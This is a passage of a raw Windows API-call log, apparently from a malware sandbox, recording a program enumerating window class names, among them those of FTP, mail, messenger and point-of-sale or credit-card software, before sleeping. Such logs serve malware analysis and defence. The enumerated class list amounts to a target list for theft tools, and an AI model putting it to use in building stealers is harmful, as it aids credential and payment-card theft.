hWnd=0x100c2, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.518] GetClassNameA (in: hWnd=0x10088, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.519] GetClassNameA (in: hWnd=0x10096, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.519] GetClassNameA (in: hWnd=0x100bc, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.519] GetClassNameA (in: hWnd=0x2007c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0108.519] GetClassNameA (in: hWnd=0x20040, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="ATL:00007FFC57374120") returned 20 [0108.519] GetClassNameA (in: hWnd=0x100d6, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.519] GetClassNameA (in: hWnd=0x100cc, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0108.519] GetClassNameA (in: hWnd=0xd02bc, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0108.519] GetClassNameA (in: hWnd=0x1020c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Alternate Owner") returned 15 [0108.519] GetClassNameA (in: hWnd=0x201ec, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.519] GetClassNameA (in: hWnd=0x50038, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.519] GetClassNameA (in: hWnd=0x3002e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.519] GetClassNameA (in: hWnd=0x20128, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0108.519] GetClassNameA (in: hWnd=0x202d0, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="VSyncHelper-00729FC0-86b2049") returned 28 [0108.519] GetClassNameA (in: hWnd=0x202ba, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0108.519] GetClassNameA (in: hWnd=0x202ac, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0108.519] GetClassNameA (in: hWnd=0x20296, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Alternate Owner") returned 15 [0108.519] GetClassNameA (in: hWnd=0x1039c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.519] GetClassNameA (in: hWnd=0x10322, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="VSyncHelper-0078AC20-829112b") returned 28 [0108.520] GetClassNameA (in: hWnd=0x20248, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0108.520] GetClassNameA (in: hWnd=0x10216, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0108.520] GetClassNameA (in: hWnd=0x10204, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.520] GetClassNameA (in: hWnd=0x301dc, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0108.520] GetClassNameA (in: hWnd=0x201d8, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.520] GetClassNameA (in: hWnd=0x30030, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.520] GetClassNameA (in: hWnd=0x2012e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0108.520] GetClassNameA (in: hWnd=0x2012a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0108.520] GetClassNameA (in: hWnd=0x30124, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.520] GetClassNameA (in: hWnd=0x301ea, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.520] GetClassNameA (in: hWnd=0x10386, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="absolutetelnetcls") returned 17 [0108.520] GetClassNameA (in: hWnd=0x10384, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="3dftpwindow") returned 11 [0108.520] GetClassNameA (in: hWnd=0x20374, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="alftp_wnd") returned 9 [0108.520] GetClassNameA (in: hWnd=0x1036a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="filezilla_app") returned 13 [0108.520] GetClassNameA (in: hWnd=0x10380, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="farwnd") returned 6 [0108.521] GetClassNameA (in: hWnd=0x1037c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="barca") returned 5 [0108.521] GetClassNameA (in: hWnd=0x1037a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="bitkinex") returned 8 [0108.521] GetClassNameA (in: hWnd=0x1035e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="fling_class") returned 11 [0108.521] GetClassNameA (in: hWnd=0x10370, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="coreftpwindow") returned 13 [0108.521] GetClassNameA (in: hWnd=0x10342, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="notepadwnd") returned 10 [0108.521] GetClassNameA (in: hWnd=0x10368, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="flashfxp_win") returned 12 [0108.521] GetClassNameA (in: hWnd=0x1035c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="foxmailincmail_win") returned 18 [0108.521] GetClassNameA (in: hWnd=0x10348, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="icqwindow") returned 9 [0108.521] GetClassNameA (in: hWnd=0x10352, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="gmailnotifierproclass") returned 21 [0108.521] GetClassNameA (in: hWnd=0x1033e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="ncftpwin") returned 8 [0108.521] GetClassNameA (in: hWnd=0x1034c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="leechftp_") returned 9 [0108.521] GetClassNameA (in: hWnd=0x1033a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="operamailapp") returned 12 [0108.521] GetClassNameA (in: hWnd=0x10338, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="outlook_window") returned 14 [0108.521] GetClassNameA (in: hWnd=0x1032e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="pidgin_window") returned 13 [0108.521] GetClassNameA (in: hWnd=0x10330, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="scriptftp_") returned 10 [0108.521] GetClassNameA (in: hWnd=0x10328, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="smartftp_") returned 9 [0108.521] GetClassNameA (in: hWnd=0x1030c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="yahoomessenger_") returned 15 [0108.521] GetClassNameA (in: hWnd=0x10306, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="winscp_cls") returned 10 [0108.521] GetClassNameA (in: hWnd=0x20236, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="active-charge") returned 13 [0108.522] GetClassNameA (in: hWnd=0x10304, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="whatsapp_wnd") returned 12 [0108.522] GetClassNameA (in: hWnd=0x10300, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="webdrivewin") returned 11 [0108.522] GetClassNameA (in: hWnd=0x102fc, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="trillianclass") returned 13 [0108.522] GetClassNameA (in: hWnd=0x102f4, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="skypewindow") returned 11 [0108.522] GetClassNameA (in: hWnd=0x102f8, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="thunderbirdwin") returned 14 [0108.522] GetClassNameA (in: hWnd=0x102de, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="mxslipstream_cls") returned 16 [0108.522] GetClassNameA (in: hWnd=0x102d6, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="accuposwindow") returned 13 [0108.522] GetClassNameA (in: hWnd=0x2024a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="afr38window") returned 11 [0108.522] GetClassNameA (in: hWnd=0x102d4, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="aldelo_win") returned 10 [0108.522] GetClassNameA (in: hWnd=0x20246, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="spgagentservice") returned 15 [0108.522] GetClassNameA (in: hWnd=0x102ce, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="utg2window") returned 10 [0108.522] GetClassNameA (in: hWnd=0x102c2, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="omniposcls") returned 10 [0108.522] GetClassNameA (in: hWnd=0x102c4, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="spcwin_") returned 7 [0108.522] GetClassNameA (in: hWnd=0x102be, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="issposwindow") returned 12 [0108.522] GetClassNameA (in: hWnd=0x102b2, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="fposapp") returned 7 [0108.522] GetClassNameA (in: hWnd=0x102b0, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="edcsvr") returned 6 [0108.522] GetClassNameA (in: hWnd=0x102a8, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="creditservice_win") returned 17 [0108.522] GetClassNameA (in: hWnd=0x1029c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="ccv_server_app") returned 14 [0108.522] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="centralcreditcard_win") returned 21 [0108.523] GetClassNameA (in: hWnd=0x10292, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="love_window") returned 11 [0108.523] GetClassNameA (in: hWnd=0x40220, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Feel_Final_cls") returned 14 [0108.523] GetClassNameA (in: hWnd=0x20266, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Look_win") returned 8 [0108.523] GetClassNameA (in: hWnd=0x10278, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="play_religious_cls") returned 18 [0108.523] GetClassNameA (in: hWnd=0x1026e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Present_Agree_cls") returned 17 [0108.523] GetClassNameA (in: hWnd=0x1027a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="populationReadwindow") returned 20 [0108.523] GetClassNameA (in: hWnd=0x10234, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="SafeSomebodywin") returned 15 [0108.523] GetClassNameA (in: hWnd=0x10270, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Articleclass") returned 12 [0108.523] GetClassNameA (in: hWnd=0x1025c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="New_sign_Sister_wnd") returned 19 [0108.523] GetClassNameA (in: hWnd=0x1025a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Applywouldwindow") returned 16 [0108.523] GetClassNameA (in: hWnd=0x10258, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="ofofficialwindow") returned 16 [0108.523] GetClassNameA (in: hWnd=0x2024c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Billion_") returned 8 [0108.523] GetClassNameA (in: hWnd=0x10238, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Lowcls") returned 6 [0108.523] GetClassNameA (in: hWnd=0x10232, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Singthatheartcls") returned 16 [0108.523] GetClassNameA (in: hWnd=0x1026a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0108.523] GetClassNameA (in: hWnd=0x1022a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="TruthStatementclass") returned 19 [0108.523] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Let_dark_") returned 9 [0108.523] GetClassNameA (in: hWnd=0x1022c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="travelRedclass") returned 14 [0108.523] GetClassNameA (in: hWnd=0x10228, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="whatdriveDecideclass") returned 20 [0108.523] GetClassNameA (in: hWnd=0x101d6, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.523] GetClassNameA (in: hWnd=0x101d2, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.523] GetClassNameA (in: hWnd=0x101c6, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="ATL:00007FFC52E07080") returned 20 [0108.523] GetClassNameA (in: hWnd=0x101be, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.524] GetClassNameA (in: hWnd=0x101ae, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0108.524] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.524] GetClassNameA (in: hWnd=0x101a8, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0108.524] GetClassNameA (in: hWnd=0x1014c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0108.524] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0108.524] GetClassNameA (in: hWnd=0x10110, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.524] GetClassNameA (in: hWnd=0x10122, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="TabletModeCoverWindow") returned 21 [0108.524] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.524] GetClassNameA (in: hWnd=0x101a0, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.524] GetClassNameA (in: hWnd=0x10116, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0108.524] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0108.524] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0108.524] GetClassNameA (in: hWnd=0x100f2, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0108.524] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.524] GetClassNameA (in: hWnd=0x100e4, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.524] GetClassNameA (in: hWnd=0x100e2, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.524] GetClassNameA (in: hWnd=0x200da, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.524] GetClassNameA (in: hWnd=0x100c0, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0108.524] GetClassNameA (in: hWnd=0x20042, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0108.524] GetClassNameA (in: hWnd=0x20028, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0108.524] GetClassNameA (in: hWnd=0x30020, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0108.525] GetClassNameA (in: hWnd=0x2002a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0108.525] GetClassNameA (in: hWnd=0x2004a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0108.525] GetClassNameA (in: hWnd=0x100ac, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0108.525] GetClassNameA (in: hWnd=0x10076, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0108.525] GetClassNameA (in: hWnd=0x10072, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0108.525] GetClassNameA (in: hWnd=0x1001c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0108.525] GetClassNameA (in: hWnd=0x10184, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0108.525] GetClassNameA (in: hWnd=0x102c0, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0108.525] GetClassNameA (in: hWnd=0x302ae, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0108.525] GetClassNameA (in: hWnd=0x100d0, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0108.525] GetClassNameA (in: hWnd=0x10136, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.525] GetClassNameA (in: hWnd=0x1017c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.525] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.525] GetClassNameA (in: hWnd=0x1015c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.525] GetClassNameA (in: hWnd=0x10190, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.525] GetClassNameA (in: hWnd=0x100ce, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0108.525] GetClassNameA (in: hWnd=0x1007e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.525] GetClassNameA (in: hWnd=0x901fc, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.525] GetClassNameA (in: hWnd=0x1020e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.525] GetClassNameA (in: hWnd=0x20298, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.525] GetClassNameA (in: hWnd=0x10206, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x301f2, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x1039e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x1039a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x10398, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x10396, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x10394, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x10392, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x10390, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x1038e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x1038c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x1038a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x10388, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x1037e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x10378, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x10372, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x10366, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x10360, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x10356, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.526] GetClassNameA (in: hWnd=0x10354, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x1034a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x10344, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x10332, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x401fe, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x40080, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x1031c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x10314, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x10312, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x10310, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x1030e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x1030a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x102ec, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x102e8, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x3023c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x102e6, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x102e4, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x102e2, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x102e0, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x102dc, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.527] GetClassNameA (in: hWnd=0x102da, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x102d8, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x20244, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x102c8, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x102b6, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x102b4, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x20218, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x102aa, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x1029e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x10290, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x1028e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x1028c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x4021e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x1028a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x10288, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x10286, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x10284, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x10282, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x1027c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x10274, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.528] GetClassNameA (in: hWnd=0x10260, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.529] GetClassNameA (in: hWnd=0x10256, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.529] GetClassNameA (in: hWnd=0x10242, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.529] GetClassNameA (in: hWnd=0x10240, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.529] GetClassNameA (in: hWnd=0x101d4, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.529] GetClassNameA (in: hWnd=0x101c8, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.529] GetClassNameA (in: hWnd=0x101ac, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.529] GetClassNameA (in: hWnd=0x1014e, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.529] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.529] GetClassNameA (in: hWnd=0x100f0, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.529] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0108.529] GetClassNameA (in: hWnd=0x100dc, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.529] GetClassNameA (in: hWnd=0x2002c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.529] GetClassNameA (in: hWnd=0x10074, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0108.529] Sleep (dwMilliseconds=0x64) [0108.685] 